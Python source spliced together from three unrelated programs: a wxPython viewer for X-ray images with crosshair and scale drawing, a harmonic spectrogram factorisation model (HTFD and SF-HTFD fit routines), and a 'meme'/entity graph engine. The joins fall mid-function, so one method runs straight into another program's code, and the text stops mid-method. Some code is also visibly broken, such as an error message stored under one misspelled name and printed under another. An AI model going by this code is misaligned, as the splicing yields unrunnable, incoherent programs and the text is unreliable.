ox,oy = self.origin()
s = self.ScaleFactor
dx = self.PixelSize
cx,cy = (x0*sx-ox+w/2)/s*dx, (y0*sy-oy+h/2)/s*dx
return cx,cy
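# GetViewportCenter converts the scroll position (in scroll units) to mm:
# virtual pixels (x0*sx, y0*sy), shifted by the centering offset (ox,oy) and
# by half the client size, then divided by the zoom factor s and scaled by
# the pixel size dx. SetViewportCenter below is meant to be its inverse.
# A minimal round-trip sketch, assuming `viewer` is an instance of this class:
# viewer.ViewportCenter = (1.5, 2.0) # scroll so that (1.5 mm, 2.0 mm) is centered
# cx, cy = viewer.ViewportCenter # should read back approximately (1.5, 2.0)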
def SetViewportCenter(self,(cx,cy)):
"""Scroll such than the center the window is x mm from the
left edge and y mm from the top edge of the image.
"""
w,h = self.ClientSize
sx,sy = self.GetScrollPixelsPerUnit()
ox,oy = self.origin()
s = self.ScaleFactor
dx = self.PixelSize
x0 = cx/sx/dx*s-w/2+ox
y0 = cy/sy/dx*s-h/2+oy
self.Scroll(x0,y0)
self.viewport_center = self.GetViewportCenter()
ViewportCenter = property(GetViewportCenter,SetViewportCenter,
doc=GetViewportCenter.__doc__)
def GetImageOrigin(self):
if self.crosshair != None: x,y = self.crosshair
else: x,y = (self.Image.shape[-2]/2,self.Image.shape[-1]/2)
w,h = self.Image.shape[-2:]
return -x*self.PixelSize,-(h-y)*self.PixelSize
ImageOrigin = property(GetImageOrigin,doc="image center defined by crosshair")
def GetCrosshair(self):
"Returns the crosshair coordinates in pixels from the top left as (x,y) tuple"
return self.crosshair
def SetCrosshair (self,position):
"position must be a tuple (x,y)"
self.crosshair = position
self.Refresh()
Crosshair = property(GetCrosshair,SetCrosshair,doc=
"Coordinates of cross displayed on the image in pixels from top left")
def GetScale(self):
"Returns list of tuples [(x1,y1),(x2,y2)]"
return self.scale
def SetScale (self,line):
"'line' must be a list of tuples [(x1,y1),(x2,y2)]"
self.scale = line
self.Refresh()
Scale = property(GetScale,SetScale,doc="""movable measurement line drawn
on the image, format [(x1,y1),(x2,y2)]""")
def GetScaleUnit(self):
"mm or pixels"
if self.PixelSize != 1: return "mm"
else: return "pixels"
ScaleUnit = property(GetScaleUnit)
def origin(self):
"""
Top left corner of the image in virtual pixel coordinates.
(Origin: top left of the virtual scrolling area = (0,0)).
By default, a Scrolled Window places its active area in the top
left, if it is smaller than the window size.
Instead, I want it centered in the window.
The function calculates the active area origin as a function of window
size.
"""
width,height = self.GetSizeTuple()
x = (width - self.Image.shape[-2]*self.ScaleFactor)/2
y = (height - self.Image.shape[-1]*self.ScaleFactor)/2
if x<0: x = 0
if y<0: y = 0
return x,y
def rotate(self,point):
"used to apply the rotation to the image center to the cross-hair"
if point == None: return
(x,y) = point
(w,h) = (self.Image.shape[-2],self.Image.shape[-1])
if self.orientation == 0: return (x,y)
if self.orientation == -90: return (h-y,x)
if self.orientation == 90: return (y,w-x)
if self.orientation == 180: return (w-x,h-y)
return (x,y)
def unrotate(self,point):
"used to apply the rotation to the image center to the cross-hair"
if point == None: return
(x,y) = point
(w,h) = (self.Image.shape[-2],self.Image.shape[-1])
if self.orientation == 0: return (x,y)
if self.orientation == -90: return (y,h-x)
if self.orientation == 90: return (w-y,x)
if self.orientation == 180: return (w-x,h-y)
return (x,y)
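# rotate() maps a point from the stored image frame to the displayed
# (rotated) frame and unrotate() appears to be its inverse. A small worked
# example, assuming an image with w=100, h=200 and orientation = 90:
# rotate((10, 20)) -> (20, 90) because (x,y) -> (y, w-x)
# unrotate((20, 90)) -> (10, 20) recovering the original point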
def OnPaint (self,event):
"""Called by WX whenever the contents of the window
need re-rendering, e.g. when the window is brought to the front,
uncovered, or restored from a minimized state."""
dc = wx.PaintDC(self)
dc = wx.BufferedDC(dc) # avoids flickering
self.PrepareDC(dc)
# Need to fill the area not covered by the image
# because automatic background erase was turned off.
dc.SetBrush (wx.Brush("GREY"))
dc.SetPen (wx.Pen("GREY",0))
width,height = self.GetSizeTuple()
dc.DrawRectangle (0,0,width,height)
# This centers the image in the window, if the window is larger than
# the image.
if dc.GetDeviceOriginTuple() == (0,0):
dc.SetDeviceOrigin(*self.origin())
self.draw(dc)
def OnEraseBackground(self, event):
"""Override default background fill, avoiding flickering"""
def draw (self,dc):
"""Render the contents of the window."""
from numpy import uint8,ndarray,minimum
from time import time; t = [time()]; m = ""
# Compress the dynamic range from 0...SaturationLevel to 0...255.
scale = 255./max(self.SaturationLevel,1)
image = minimum(self.Image*scale,255).astype(uint8)
t += [time()]; m += "Scale to 8 bits %.3f s\n" % (t[-1]-t[-2])
# Convert from gray scale to RGB format if needed.
if image.ndim < 3:
w,h = self.Image.shape[-2:]
RGB = ndarray((3,w,h),uint8,order="F")
RGB[0],RGB[1],RGB[2] = image,image,image
image = RGB
t += [time()]; m += "RGB array %.3f s\n" % (t[-1]-t[-2])
# Superimpose the mask if present.
if self.show_mask and self.Mask != None:
mask = self.Mask
R,G,B = image
r,g,b = self.mask_color
x = self.mask_opacity
R[mask] = (1-x)*R[mask]+x*r
G[mask] = (1-x)*G[mask]+x*g
B[mask] = (1-x)*B[mask]+x*b
t += [time()]; m += "Mask %.3f s\n" % (t[-1]-t[-2])
# Convert image from numpy to WX image format.
##data = image.T.tostring()
##t += [time()]; m += "Transpose %.3f s\n" % (t[-1]-t[-2])
data = image
w,h = self.Image.shape[-2:]
image = wx.ImageFromData(w,h,data)
t += [time()]; m += "WX image %.3f s\n" % (t[-1]-t[-2])
# Scale the image.
w = image.Width * self.ScaleFactor
h = image.Height * self.ScaleFactor
# Use 'quality=wx.IMAGE_QUALITY_HIGH' for bicubic and box averaging
# resampling methods for upsampling and downsampling respectively.
if self.ScaleFactor < 1: quality = wx.IMAGE_QUALITY_HIGH
else: quality = wx.IMAGE_QUALITY_NORMAL
image = image.Scale(w,h) ## quality=quality
t += [time()]; m += "Resample %.3f s\n" % (t[-1]-t[-2])
if self.orientation == 90: image=image.Rotate90(clockwise=False)
if self.orientation == -90: image=image.Rotate90(clockwise=True)
if self.orientation == 180: image=image.Rotate90().Rotate90()
t += [time()]; m += "Rotate %.3f s\n" % (t[-1]-t[-2])
bitmap = wx.BitmapFromImage(image)
t += [time()]; m += "WX bitmap %.3f s\n" % (t[-1]-t[-2])
dc.DrawBitmap (bitmap,0,0)
t += [time()]; m += "Render %.3f s\n" % (t[-1]-t[-2])
self.draw_crosshair(dc)
self.draw_box(dc)
self.draw_scale(dc)
t += [time()]; m += "Annotate %.3f s\n" % (t[-1]-t[-2])
m += "Total %.3f s\n" % (t[-1]-t[0])
##print m
def draw_crosshair (self,dc):
"Indicates the X-ray beam position as a cross"
if self.show_crosshair and self.crosshair != None:
dc.SetPen (wx.Pen(self.crosshair_color,1))
w,h = self.crosshair_size
x1,y1 = self.pixel((-w/2,0)); x2,y2 = self.pixel((+w/2,0))
dc.DrawLine (x1,y1,x2,y2)
x1,y1 = self.pixel((0,-h/2)); x2,y2 = self.pixel((0,+h/2))
dc.DrawLine (x1,y1,x2,y2)
def draw_box (self,dc):
"Draws a box around the cross hair to indicate X-ray beam size."
if self.show_box:
w,h = self.boxsize
x1,y1 = self.pixel((w/2,h/2))
x2,y2 = self.pixel((-w/2,-h/2))
dc.SetPen (wx.Pen(self.box_color,1))
dc.DrawLines ([(x1,y1),(x2,y1),(x2,y2),(x1,y2),(x1,y1)])
def draw_scale (self,dc):
if not self.show_scale or self.scale == None: return
P1,P2 = self.scale
x1,y1 = self.pixel(P1)
x2,y2 = self.pixel(P2)
dc.SetPen (wx.Pen(self.scale_color,1))
dc.DrawLine (x1,y1,x2,y2)
length = distance(P1,P2)
if self.ScaleUnit == "mm":
if length < 1: label = "%.0f um" % (length*1000)
else: label = "%.3f mm" % length
else: label = "%g %s" % (length,self.ScaleUnit)
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
font.SetPointSize(10)
dc.SetFont(font)
dc.SetTextForeground(self.scale_color)
w,h = dc.GetTextExtent(label)
cx = (x1+x2)/2; cy = (y1+y2)/2
phi = atan2(y2-y1,x2-x1)
tx = cx - (w/2*cos(phi) - h*sin(phi))
ty = cy - (h*cos(phi) + w/2*sin(phi))
dc.DrawRotatedText (label,tx,ty,-phi/pi*180)
if self.scale_selected: # Highlight the end points by 5x5 pixel squares
dc.DrawRectangle(x1-2,y1-2,4,4)
dc.DrawRectangle(x2-2,y2-2,4,4)
def pixel(self,(x,y)):
"Converts from mm (x,y) to virtual pixel coordinates"
if self.crosshair != None: center = self.crosshair
else: center = (self.Image.shape[-2]/2,self.Image.shape[-1]/2)
px = int(round((x/self.PixelSize+center[0])*self.ScaleFactor))
py = int(round((-y/self.PixelSize+center[1])*self.ScaleFactor))
return px,py
def point(self,(px,py)):
"Converts from pixel virtual (px,py) to mm (x,y) coordinates"
if self.crosshair != None: center = self.crosshair
else: center = (self.Image.shape[-2]/2,self.Image.shape[-1]/2)
x = (px/self.ScaleFactor-center[0])*self.PixelSize
y = -(py/self.ScaleFactor-center[1])*self.PixelSize
return x,y
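# pixel() and point() are intended as inverse transforms between mm
# coordinates (relative to the crosshair, y pointing up) and virtual pixel
# coordinates (y pointing down), up to the rounding in pixel(). A minimal
# sketch, assuming PixelSize=0.01, ScaleFactor=1 and a crosshair at (640, 512):
# self.pixel((0.0, 0.0)) -> (640, 512) # the crosshair itself
# self.point((640, 512)) -> (0.0, 0.0) # back to mm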
def SetStatusText(self,status_text):
"display the in the status bar of te top level window"
window = self.Parent
while not hasattr(window,"SetStatusText"): window = window.Parent
window.SetStatusText(status_text)
def OnLeftButtonEvent (self,event):
"for dragging the crosshair or scale"
# This makes sure that keyboard input goes to this window when selecting
# it by clicking the mouse button inside it.
# It also makes sure that mouse wheel events are received.
if event.LeftDown(): self.SetFocus()
p = self.cursor_pos(event)
if event.LeftDown() or event.Dragging():
# Report the image pixel coordinates and pixel intensity at the
# cursor position in the window's status bar.
from math import floor
x,y
else:
accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
compute_X()
return X
def fit(self, org_Y, n_iter=100, update_flags=[True,True,True], post_process=None, log_interval=10):
'''Fit model to `org_Y`
Args:
org_Y (xp.ndarray): Observed magnitude spectrogram, n_freqs x n_frames
n_iter (int): # of iterations
update_flags (list[bool]): Update flags for U, w, and Omega
post_process (func): Post process invoked every `log_interval` iterations
log_interval (int): # of iterations for logging and post process
'''
xp = cupy.get_array_module(org_Y)
# normalization
Y = self.normalize_spectrogram(org_Y)
X = xp.zeros_like(Y)
# prepare
ln_n = xp.log(xp.arange(1, self.n_harmonics+1)).astype(X.dtype) # n_harmonics
width = int(max(self.min_calc_range, numpy.round(self.calc_width*self.sigma*2.0/self.dx)))
width_range = xp.arange(width).astype('i') # width
Ylambda = xp.zeros((self.n_bases, self.n_frames, self.n_harmonics, width), dtype=X.dtype)
# U: n_bases x n_frames
# w: n_bases x n_harmonics
# Omega: n_bases x n_frames
def compute_lnG():
Omega_ln_n = ln_n[None,None,:] + self.Omega[:,:,None] # n_bases x n_frames x n_harmonics
leftsides = Omega_ln_n - self.x[0] - width/2.0*self.dx
leftsides = xp.clip(
xp.around(leftsides/self.dx).astype('i'),
0, self.n_freqs-1 - width
)
indexes = leftsides[:,:,:,None] + width_range[None,None,None,:] # n_bases x n_frames x n_harmonics x width
lnG = -(self.x[indexes] - Omega_ln_n[:,:,:,None]).astype('f')**2 /(2.0*self.sigma**2)
return lnG, indexes
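# compute_lnG evaluates, for every basis, frame and harmonic, a log-domain
# Gaussian kernel centered at ln(n) + Omega (the log-frequency of the n-th
# harmonic) over a narrow window of `width` frequency bins rather than the
# full axis; `indexes` records which spectrogram bins each window covers so
# the contributions can later be scattered back via accumulate_local_X.
# This appears to keep the per-iteration cost proportional to `width`
# instead of n_freqs.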
def compute_X():
lnG, indexes = compute_lnG() # n_bases x n_frames x n_harmonics x width
Xcomp = xp.exp(lnG) * (self.U[:,:,None,None] * self.w[:,None,:,None]) # n_bases x n_frames x n_harmonics x width
X[:] = 0.0
# accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
if xp == numpy:
accumulate_local_X_cpu(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
else:
accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
def update_Ylambda():
lnG, indexes = compute_lnG() # n_bases x n_frames x n_harmonics x width
Xcomp = xp.exp(lnG) * (self.U[:,:,None,None] * self.w[:,None,:,None]) # n_bases x n_frames x n_harmonics x width
X[:] = 0.0
# accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
if xp == numpy:
accumulate_local_X_cpu(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
else:
accumulate_local_X(Xcomp, indexes, *Xcomp.shape[1:], self.n_freqs, X)
# X[:] = xp.maximum(self.eps, X[:])
Ylambda[:] = 0.0
if xp == numpy:
compute_Ylambda_helper_cpu(Xcomp, indexes, X, Y, *Xcomp.shape[1:], self.n_freqs, Ylambda) # n_bases x n_frames x n_harmonics x width
else:
compute_Ylambda_helper(Xcomp, indexes, X, Y, *Xcomp.shape[1:], self.n_freqs, Ylambda) # n_bases x n_frames x n_harmonics x width
return indexes
def update_U():
numU = Ylambda.sum(axis=(2,3)) + self.alpha_U-1
numU[numU<0]=0
denomU = self._const + self.beta_U
newU = xp.maximum(self.eps, numU/denomU)
return newU
def update_w():
new_w = Ylambda.sum(axis=(1,3))/xp.maximum(self.eps, self._const*self.U.sum(axis=1,keepdims=True)) # n_bases x n_harmonics
new_w = xp.maximum(self.eps, new_w/new_w.sum(axis=1,keepdims=True))
return new_w
def update_Omega(l_indexes):
# prepare
main_diag_of_DtD = xp.pad(xp.ones((self.n_frames-2,), dtype=self.Omega.dtype)*2, ((1,1),), mode="constant", constant_values=1.0) # n_frames
# denom
denom_main_diag = Ylambda.sum(axis=(2,3))/(self.sigma**2) # n_bases x n_frames
denom_main_diag += self.alpha_global / self.v2 + main_diag_of_DtD[None,:] * (self.alpha_local / self.tau2)
denom_lower_diag = -xp.ones((self.n_bases, self.n_frames-1), dtype=self.Omega.dtype) * (self.alpha_local / self.tau2)
# numel
# TODO: use update_Omega_helper
new_Omega = (((self.x[l_indexes] - ln_n[None,None,:,None]) * Ylambda).sum(axis=(2,3))/(self.sigma**2)) # n_bases x n_frames
new_Omega += self.mu[:,None]*self.alpha_global/self.v2
# solve tridiagonal systems
if xp == numpy:
batched_gtsv_cpu(denom_lower_diag, denom_main_diag, denom_lower_diag, new_Omega)
else:
batched_gtsv(denom_lower_diag, denom_main_diag, denom_lower_diag, new_Omega)
return new_Omega
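# update_Omega solves, independently for each basis, a symmetric tridiagonal
# system: the main diagonal combines the data term (Ylambda/sigma^2), the
# global prior alpha_global/v2 and the frame-to-frame smoothness prior
# alpha_local/tau2 (through D^T D), while the off-diagonals carry only the
# smoothness coupling between neighbouring frames. batched_gtsv /
# batched_gtsv_cpu overwrite `new_Omega` in place with the solution.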
def get_loss():
X[:] = xp.maximum(X, self.eps)
ll = (Y * xp.log(X) - X).sum()
prior = -((self.Omega - self.mu[:,None])**2/(2*self.v2)).sum() * self.alpha_global
prior += -((self.Omega[:,:self.n_frames-1] - self.Omega[:,1:])**2/(2*self.tau2)).sum() * self.alpha_local
# U prior
prior += ((self.alpha_U-1)*xp.log(self.U) - self.beta_U*self.U).sum()
return -(ll+prior)
for iter in range(n_iter):
if update_flags[0]:
comp_freq_indexes = update_Ylambda()
self.U[:] = update_U()
if update_flags[1]:
comp_freq_indexes = update_Ylambda()
self.w[:] = update_w()
if update_flags[2]:
comp_freq_indexes = update_Ylambda()
self.Omega[:] = update_Omega(comp_freq_indexes)
compute_X()
# get loss
if iter == 0 or (iter+1)%log_interval==0 or iter == n_iter - 1:
loss = get_loss()
logger.info("{}/{}: {}".format(iter+1, n_iter, loss))
if post_process is not None:
post_process(iter+1)
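# A minimal usage sketch for the fit() method above. The class name and
# constructor arguments are not visible in this excerpt, so everything but
# the fit() call itself is a placeholder and should be read as an assumption:
# model = SomeSeparatorClass(...) # construct, then call its init_* helpers
# model.fit(Y, n_iter=100, update_flags=[True, True, True], log_interval=10)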
class SFHTFD(BaseSeparator):
'''Source-filter harmonic-temporal factor decomposition (SF-HTFD)
'''
@property
def E_w(self):
return NakagamiDistribution.E_w(self.w_a,
self.w_b,
self.xp,
approx=self.use_approx_Nakagami)
@property
def E_ln_w(self):
return NakagamiDistribution.E_ln_w(self.w_a,
self.w_b,
self.xp,
approx=self.use_approx_Nakagami)
@property
def E_w2(self):
return NakagamiDistribution.E_w2(self.w_a, self.w_b, self.xp)
@property
def w_mask(self):
'''
Returns:
xp.ndarray: True where the harmonic frequency is within the valid range (below pi), n_filters x n_bases x n_frames x n_harmonics
'''
xp = self.xp
n = xp.arange(1, self.n_harmonics + 1).astype(
self.Omega.dtype) # n_harmonics
return xp.exp(
self.Omega[:, :, :, None]) * n[None, None, None, :] < numpy.pi
def _compute_squared_Az(self):
xp = self.xp
n = xp.arange(1, self.n_harmonics + 1).astype(
self.Omega.dtype) # n_harmonics
omega = xp.exp(self.Omega[:, :, :, None]) * n[
None, None,
None, :] # n_filters x n_bases x n_frames x n_harmonics
# A: n_filters x filter_deg+1
real = xp.zeros(
(self.n_filters, self.n_bases, self.n_frames, self.n_harmonics),
dtype=omega.dtype)
imag = xp.zeros(
(self.n_filters, self.n_bases, self.n_frames, self.n_harmonics),
dtype=omega.dtype)
for q in range(self.A.shape[1]):
real += xp.cos(-omega * q) * self.A[:, q, None, None, None]
imag += xp.sin(-omega * q) * self.A[:, q, None, None, None]
squared_Az = real * real + imag * imag
valid_mask = omega < numpy.pi
return squared_Az, valid_mask
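# _compute_squared_Az evaluates |A(e^{j*omega})|^2, the squared magnitude of
# the AR polynomial A(z) = sum_q A[q] * z^-q, at each harmonic frequency
# omega = n * exp(Omega), by accumulating the real and imaginary parts of
# sum_q A[q] * exp(-j*omega*q). inv_squared_Az below then yields the
# all-pole power response 1/|A(e^{j*omega})|^2 used as the spectral envelope.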
@property
def inv_squared_Az(self):
squared_Az, valid_mask = self._compute_squared_Az()
F = 1.0 / squared_Az
check_naninf(F, self.xp)
return F, valid_mask
def init_params(self, n_filters, filter_degree=16, normalize_ar_coeffs=True,input_normalization="average", use_approx_Nakagami=False):
''' Parameter initialization
Args:
n_filters (int): # of filters
filter_degree (int): Filter degree
normalize_ar_coeffs (bool): If True, normalize a so that a <- a/a[0]
input_normalization (str): Input normalization method
use_approx_Nakagami (bool): If True, the expectations related to the Nakagami distribution are approximately computed (slightly faster but not exact).
'''
self.use_approx_Nakagami = use_approx_Nakagami
self.n_filters = n_filters
self._input_normalization = input_normalization
self.Omega = numpy.tile(self.mu[None, :, None], (self.n_filters, 1, self.n_frames)).astype('f') # n_filters x n_bases x n_frames
initA = numpy.poly(numpy.ones(filter_degree - 1) * 0.1 + self.random_state.uniform(-0.01, 0.01, size=(filter_degree - 1, ))).astype('f')
self.A = numpy.tile(initA[None, :], (self.n_filters, 1)) # n_filters x filter_degree+1
self.normalize_ar_coeffs = normalize_ar_coeffs
if self.normalize_ar_coeffs:
self.A /= self.A[:, 0, None]
self.w_a = numpy.ones((self.n_filters, self.n_bases, self.n_frames, self.n_harmonics), dtype='f') # n_filters x n_bases x n_frames x n_harmonics
inv_squared_Az, valid_mask = self.inv_squared_Az
self.w_b = (2.0 * inv_squared_Az).astype('f') # n_filters x n_bases x n_frames x n_harmonics
# self.w_b[self.xp.logical_not(valid_mask)] = self.xp.nan
self.U = self.random_state.uniform(0.0, 1.0, size=(self.n_filters, self.n_bases, self.n_frames)).astype('f')
########
self._transferred_arrays += ["Omega", "A", "w_a", "w_b", "U"]
def init_priors(self, lnF0s, alpha_U=0.1, sigma=numpy.log(2.0) / 60.0, dt=0.01, n_DAP_iter=1, pole_mag_thresh=0.99, alphas_Omega=[1, 1]):
'''Prior initialization
Args:
lnF0s (numpy.ndarray): Center log-fundamental frequencies of spectral bases [log-rad]
'''
self.pole_mag_thresh = pole_mag_thresh
self.n_DAP_iter = n_DAP_iter
self.alpha_global = numpy.float32(alphas_Omega[0])
self.alpha_local = numpy.float32(alphas_Omega[1])
self.sigma = numpy.float32(sigma)
self._const = numpy.float32(sigma * numpy.sqrt(2.0 * numpy.pi) / self.dx)
#
self.alpha_U = numpy.float32(alpha_U)
self.beta_U = 1.0
self.mu = lnF0s.astype('f') # n_bases
self.tau2 = numpy.float32((numpy.log(2) / 12 / (1 / 6) * dt))**2.0
self.v2 = numpy.float32((numpy.log(2) / 12.0 / 3.0))**2.0
self._transferred_arrays += ["mu"]
def fit(self, org_Y, n_iter=100, update_flags=[True, True, True, True], post_process=None, log_interval=10):
'''
Args:
org_Y (xp.ndarray): Observed magnitude spectrogram, n_freqs x n_frames
n_iter (int): # of iterations
update_flags (list[bool]): Update flags for U, q(w^2), A, and Omega
post_process (func): Post process invoked every `log_interval` iterations
log_interval (int): # of iterations for logging and post process
'''
xp = cupy.get_array_module(org_Y)
# normalization
Y = self.normalize_spectrogram(org_Y)
# prepare
X = xp.zeros_like(Y)
ln_n = xp.log(xp.arange(1, self.n_harmonics + 1)).astype(X.dtype) # n_harmonics
width = int(max(self.min_calc_range, numpy.round(self.calc_width * self.sigma * 2.0 / self.dx)))
width_range = xp.arange(width).astype('i') # width
# Auxiliary variable: n_filters x n_bases x n_frames x n_harmonics x width (frequency bin)
Ylambda = xp.zeros((self.n_filters, self.n_bases, self.n_frames, self.n_harmonics, width), dtype=X.dtype)
# U: n_filters x n_bases x n_frames
# A: n_filters x filter_degree+1
# w_a, w_b: n_filters x n_bases x n_frames x n_harmonics
# Omega: n_bases x n_frames
def compute_G():
ln_omega = ln_n[None, None, None, :] + self.Omega[:, :, :, None] # n_filters x n_bases x n_frames x n_harmonics
leftsides = ln_omega - self.x[0] - width / 2.0 * self.dx
leftsides = xp.around(leftsides / self.dx).astype('i')
indexes = leftsides[:, :, :, :, None] + width_range[None, None, None, None, :] # n_filters x n_bases x n_frames x n_harmonics x width
if xp == numpy:
G = xp.zeros(indexes.shape, dtype='f')
compute_G_cpu(self.x.astype('f'), indexes.reshape(-1, *indexes.shape[2:]), ln_omega.reshape(-1, *ln_omega.shape[2:]).astype('f'), self.sigma, width, self.n_freqs, G.reshape(-1, *G.shape[2:]))
elif xp == cupy:
G = compute_G_helper(self.x, indexes, ln_omega, self.sigma, width, self.n_freqs)
else:
raise UnknownNdarrayModuleError(xp)
return G, indexes
def compute_X():
G, indexes = compute_G(
) # n_filters x n_bases x n_frames x n_harmonics x width
valid_mask = self.w_mask # n_filters x n_bases x n_frames x n_harmonics
Xcomp = G * self.U[:, :, :, None,
None] * self.E_w[:, :, :, :,
None] # n_filters x n_bases x n_frames x n_harmonics x width
Xcomp *= valid_mask[..., None]
X[:] = 0.0
# accumulate_local_X(Xcomp.reshape(-1, *Xcomp.shape[2:]), indexes.reshape(-1, *indexes.shape[2:]), *[int(_) for _ in Xcomp.shape[2:]], self.n_freqs, X)
if xp == numpy:
accumulate_local_X_cpu(Xcomp.reshape(-1, *Xcomp.shape[2:]), indexes.reshape(-1,
members of the current meme. E.g. we
don't want to create members when we are running a restore from DB at engine startup
If restore is True, then the current entity is being restored from the database and
we don't want to either create members (they already exist) or set the properties,
as property state exists in the DB tables and may not be the same as initial.
"""
method = moduleName + '.' + self.className + '.mergeEnhancement'
global linkRepository
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
self.tags.extend(parentMeme.tags)
self.tags = filterListDuplicates(self.tags)
if noMembers == False:
for memberMemeKey in parentMeme.memberMemes.keys():
occurs = parentMeme.memberMemes[memberMemeKey][0] #memermeme is a tuple with coocurence count at position 0 and linkType at position 1
lnkTyp = parentMeme.memberMemes[memberMemeKey][1]
if lnkTyp == 1:
unusedCatch = "me"
member = templateRepository.resolveTemplate(parentMeme.path, memberMemeKey)
n = 1
while n <= int(occurs):
try:
n = n+1
childEntityID = member.getEntityFromMeme(masterEntity)
#Now flag both entities as being linked
#All child entities created in this method have membership type = SUBATOMIC
#Don't bother locking the child for now as the public does not know about it yet
#memberID1, memberID2, membershipType, keyLink = None, masterEntity = None
#ToDo: cataloging of links is currently parameter-less
#linkRepository.catalogLink(self.uuid, childEntityID, linkTypes.SUBATOMIC, {}, masterEntity)
linkRepository.catalogLink(self.uuid, childEntityID, lnkTyp, {}, masterEntity)
except Exception as e:
errprMsg = "Problem instantiating child meme of %s. Entity initialization aborted! Traceback = %s" %(parentMeme.path.fullTemplatePath, e)
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
#debug
#childEntityID = member.getEntityFromMeme(masterEntity)
#linkRepository.catalogLink(self.uuid, childEntityID, linkTypes.SUBATOMIC, {}, masterEntity)
print(errorMsg)
break
if restore == False:
for memePropKey in parentMeme.properties.keys():
memeProperty = parentMeme.properties[memePropKey]
try:
#We really don't need to be storing entity property types as unicode strings!
if memeProperty.propertyType == "integer":
self.addIntegerProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
elif memeProperty.propertyType == "boolean":
#need to add a boolean function
self.addBooleanProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
#newProp = EntityProperty(memeProperty.name, memeProperty.value, entityPropTypes.Boolean, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
#self.properties[memeProperty.name] = newProp
elif memeProperty.propertyType == "decimal":
self.addDecimalProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
elif memeProperty.propertyType == "list":
self.addListProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
else:
self.addStringProperty(memeProperty.name, memeProperty.value, memeProperty.constrained, memeProperty.restMin, memeProperty.restMax, memeProperty.restList, parentMeme.path)
except Exception as e:
errprMsg = "Unable to create property %s on %s entity %s. Traceback = %s" %(memeProperty.name,parentMeme.path.fullTemplatePath, self.uuid, e)
logQ.put( [logType , logLevel.WARNING , method , errprMsg])
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
def revertPropertyValues(self, drillDown = False):
""" Reset property values to their original values as defined in the parent meme(s).
It does not affect custom properties or properties from deprecated memes"""
#method = moduleName + '.' + self.className + '.revertPropertyValues'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
for propertyKey in self.properties.keys():
prop = self.properties[propertyKey]
if prop.memePath is not None:
meme = templateRepository.resolveTemplateAbsolutely(self.memePath.fullTemplatePath)
memeProperty = meme.properties[propertyKey]
prop.value = memeProperty.value
#First check the parent meme for the property
#for memePropertyName in entityMeme.properties.iterkeys():
#if memePropertyName == propertyKey:
#memeProperty = entityMeme.properties[memePropertyName]
#prop.value = memeProperty.value
#updated = True
# # if we did not find the property in that meme, check the other memes
'''if updated == False:
enhancingMemesList = enhancementIndex.getEnhancements(self.memePath)
for enhancingMemeID in enhancingMemesList:
if updated == False:
enhancingMeme = templateRepository.resolveTemplateAbsolutely(enhancingMemeID)
for memePropertyName in enhancingMeme.properties.iterkeys():
if memePropertyName == propertyKey:
memeProperty = entityMeme.properties[memePropertyName]
prop.value = memeProperty.value
updated = True
'''
if drillDown == True:
links = linkRepository.getCounterparts(self.uuid)
for memberEntityID in links:
try:
member = entityRepository.getEntity(memberEntityID)
member.entityLock.acquire(True)
try:
member.revertPropertyValues(True)
finally: member.entityLock.release()
except: pass
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
def removeAllCustomProperties(self, drillDown = True):
""" Remove all properties that do not come from a meme"""
#method = moduleName + '.' + self.className + '.removeAllCustomProperties'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
deleteList = []
for propertyKey in self.properties.keys():
templateProperty = self.properties[propertyKey]
if templateProperty.memePath is None:
#if it has no memePath, then it is a custom property
deleteList.append(propertyKey)
for delPath in deleteList:
del self.properties[delPath]
if delPath in self.propertyChangeEvents:
del self.propertyChangeEvents[delPath]
if drillDown == True:
links = linkRepository.getCounterparts(self.uuid)
for memberEntityID in links:
try:
member = entityRepository.getEntity(memberEntityID)
member.entityLock.acquire(True)
try:
member.removeAllCustomProperties(True)
finally: member.entityLock.release()
except: pass
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
def getHasLinkedEntityByMemeType(self, meme, splitMetaMemePath = None, linkType = 0):
""" """
#method = moduleName + '.' + self.className + '.getHasLinkedEntityByMemeType'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
hasMember = False
try:
findList = self.getLinkedEntitiesByMemeType(meme, splitMetaMemePath, linkType)
if len(findList) > 0:
hasMember = True
except:
pass
#memberToFind = entityRepository.getEntity(uuid)
#for memberEntityEntry in self.memberEntities:
#memberEntityID = memberEntityEntry[0]
#member = entityRepository.getEntity(memberEntityID)
#if member.memePath == meme.path.fullTemplatePath:
#hasMember = True
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return hasMember
#Todo - add getCounterparts params to method call
def getAreEntitiesLinked(self, uuid, membershipType = 0):
""" """
#method = moduleName + '.' + self.className + '.getAreEntitiesLinked'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
hasMember = False
members = linkRepository.getCounterparts(self.uuid, linkDirectionTypes.BIDIRECTIONAL, [], [], membershipType)
if uuid in members:
hasMember = True
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return hasMember
def getIsSingleton(self):
""" """
#method = moduleName + '.' + self.className + '.getIsSingleton'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
